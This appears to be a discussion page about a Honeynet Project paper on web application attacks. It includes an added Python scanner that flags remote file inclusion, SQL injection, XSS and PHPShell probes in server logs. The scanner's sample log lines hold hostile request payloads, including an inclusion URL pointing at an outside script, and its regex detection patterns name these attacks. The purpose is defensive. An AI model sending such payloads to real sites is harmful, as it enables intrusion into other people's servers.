Honeynet Delineates Web Application Threats
An anonymous reader sends us to a technical white paper written by the Honeynet Project & Research Alliance: Know Your Enemy: Web Application Threats. Based on analysis of malware collected by the project, the paper outlines a number of HTTP-based attacks against web applications and some ways of protecting Web servers. Included are code injection, remote code-inclusion, SQL injection, cross-site scripting, and exploitation of the PHPShell application.
Hear that understanding? (Score:2, Insightful)
Re:Hear that understanding? (Score:1, Insightful)
But for the other part of
-register globals - 'nuff said
-SQL injection (rather crappy explanation, and an extremely basic one here - there are FAR better articles on this!)
-people not validating stuff before they use it
-XSS
etc.
Along with the same old attacks we've been seeing in server logs for ages (as long as it's updated and secured properly, it shouldn't be a problem), and more of the TOTALLY obvious (blog comment spam? o rly? people creating accounts for phishing? how surprising!)
There's really nothing new here at all. And it's all rather basic. There's nothing to argue over.
If you're a web developer and any of this (basic web app security) is new to you, then your apps shouldn't be exposed to the internet!
I suppose you're right though. We see a lot more comments when it's about the (RI|MP)AA, DRM, GPL, SCO and the like. Kind of sad IMO. Haven't seen too many good articles in the developer section in a while either... Actually, there haven't been any interesting articles (or comments to mod up) in the last couple of days.
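As an added example (not code from the Honeynet paper or from anyone in this thread), a small Python scanner that applies the point above about these attacks showing up in ordinary server logs: it URL-decodes the request target from Apache combined-format lines and tags the attack classes the paper lists (remote file inclusion, SQL injection, XSS, PHPShell probes). The log lines and the signature patterns are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log lines (Apache combined format) illustrating the
# HTTP-based attack classes the Honeynet paper lists; not real captured traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Feb/2007:12:00:01 +0000] "GET /index.php?page=http://198.51.100.9/cmd.txt? HTTP/1.1" 200 512 "-" "Mozilla/4.0"
203.0.113.6 - - [10/Feb/2007:12:00:02 +0000] "GET /news.php?id=1%27%20OR%20%271%27%3D%271 HTTP/1.1" 200 2048 "-" "Mozilla/4.0"
203.0.113.7 - - [10/Feb/2007:12:00:03 +0000] "GET /search.php?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 1024 "-" "Mozilla/4.0"
203.0.113.8 - - [10/Feb/2007:12:00:04 +0000] "GET /phpshell/phpshell.php HTTP/1.1" 404 300 "-" "Mozilla/4.0"
203.0.113.9 - - [10/Feb/2007:12:00:05 +0000] "GET /about.php?lang=en HTTP/1.1" 200 900 "-" "Mozilla/4.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# Heuristic signatures (constructed), checked against the URL-decoded request target.
SIGNATURES = [
    ("remote_file_inclusion", re.compile(r'[?&]\w+=(https?|ftp)://', re.I)),
    ("sql_injection", re.compile(r"'\s*(or|and)\s*'?\d|union\s+select|--\s*$", re.I)),
    ("cross_site_scripting", re.compile(r'<\s*script|javascript:|\bon\w+\s*=', re.I)),
    ("phpshell_probe", re.compile(r'/phpshell', re.I)),
]

def classify_request(target):
    """Return the signature names matched by a request target after URL decoding."""
    decoded = unquote_plus(unquote_plus(target))  # decode twice to catch double-encoding
    return [name for name, rx in SIGNATURES if rx.search(decoded)]

def scan_log(text):
    """Return a list of (ip, status, target, tags) for lines matching any signature."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line: skip rather than crash on odd input
        tags = classify_request(m.group("target"))
        if tags:
            hits.append((m.group("ip"), int(m.group("status")), m.group("target"), tags))
    return hits

if __name__ == "__main__":
    for ip, status, target, tags in scan_log(SAMPLE_LOG):
        print(f"{ip} {status} {','.join(tags)} {target}")
```

The 404 on the PHPShell probe is worth keeping in the report: a miss still tells you the host is being scanned for that application.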
Re:Not malware or a bot, but still an attack. (Score:2, Insightful)